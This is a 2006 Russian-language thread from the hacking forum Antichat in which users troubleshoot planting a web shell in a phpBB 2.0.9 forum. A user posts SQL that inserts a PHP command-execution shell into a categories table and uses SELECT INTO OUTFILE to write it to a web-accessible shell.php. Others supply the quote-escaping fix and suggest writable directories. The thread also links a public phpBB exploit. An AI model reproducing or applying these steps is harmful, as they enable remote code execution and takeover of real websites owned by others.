ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Заливка шелла в phpBB 2.0.9 через SQL
  #1  
Старый 05.06.2006, 13:29
Аватар для bandera
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию Заливка шелла в phpBB 2.0.9 через SQL

Почему вылетает такая ошибка при востонавлениие БД. Что можно сделать.

Error importing backup file DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cmd']); ?>', '10')' at line 1 INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '', '10') Line : 980 File : /home/xxxxx/public_html/forum/admin/admin_db_utilities.php
 

  #2  
Старый 05.06.2006, 13:34
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

'cmd']); ?> - это что такое?)) шелл напоминает наполовину)

смотри таблицу phpbb_categories. Смотри значения таблицы..скорее всего в ней дело. точно не знаю.
 

  #3  
Старый 05.06.2006, 13:49
Аватар для bandera
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Цитата:
Сообщение от Rebz  
'cmd']); ?> - это что такое?)) шелл напоминает наполовину)
Да не это ошибка так вылетает:
Писал всё правильно.

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10');

Потом:
SELECT cat_title INTO OUTFILE '/home/xxxx/public_html/forum/cache/shell.php' FROM phpbb_categories where cat_id=1;

Не пойму чо за хрень такая...

Цитата:
смотри таблицу phpbb_categories. Смотри значения таблицы..скорее всего в ней дело. точно не знаю.
Нет таблица стандартная.

Последний раз редактировалось bandera; 05.06.2006 в 13:52..
 

  #4  
Старый 05.06.2006, 13:54
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Цитата:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10');
Говорят если ковычки заслешировать - поможет.
Цитата:
<? system(GET[\'cmd\']); ?>
 

  #5  
Старый 05.06.2006, 14:06
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Ну дальше то что? Заслешировать то все равно надо.
Запрос к мускулу идет не правильный, хоть отедльный запрос, хоть востановление из бэкапа.
 

  #6  
Старый 05.06.2006, 14:10
Аватар для bandera
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Green_Bear сэнкс помогло=)

Теперь другая проблема - какая папка ещё может быть доступна для записи? А то Access denied =)

Последний раз редактировалось bandera; 05.06.2006 в 14:17..
 

  #7  
Старый 05.06.2006, 14:20
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

images/avatars/
 

  #8  
Старый 05.06.2006, 14:33
Аватар для bandera
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Цитата:
Сообщение от Green_Bear  
images/avatars/
не некатит (странно чо за хрень) ещё может что нибудь быть?

Последний раз редактировалось bandera; 05.06.2006 в 14:47..
 

  #9  
Старый 05.06.2006, 14:36
Аватар для bandera
bandera
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911

Репутация: 69
По умолчанию

Вопрос вот по этому сплойту для пхпбб <2.0.10:
http://milw0rm.com/id.php?id=647
его исправлять надо или что, а то у меня лампочка на модеме не моргнула даже, а он пишет cant connect.

Последний раз редактировалось bandera; 05.06.2006 в 14:43..
 

  #10  
Старый 06.06.2006, 14:43
Аватар для SK | Heaton
SK | Heaton
Постоянный
Регистрация: 18.06.2005
Сообщений: 872
Провел на форуме:
3007945

Репутация: 765


Отправить сообщение для SK | Heaton с помощью ICQ
По умолчанию

images/avatars/ это папка доступна для записи просто это папка стоит на фильтрации зависимо от типа файлов и размера.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ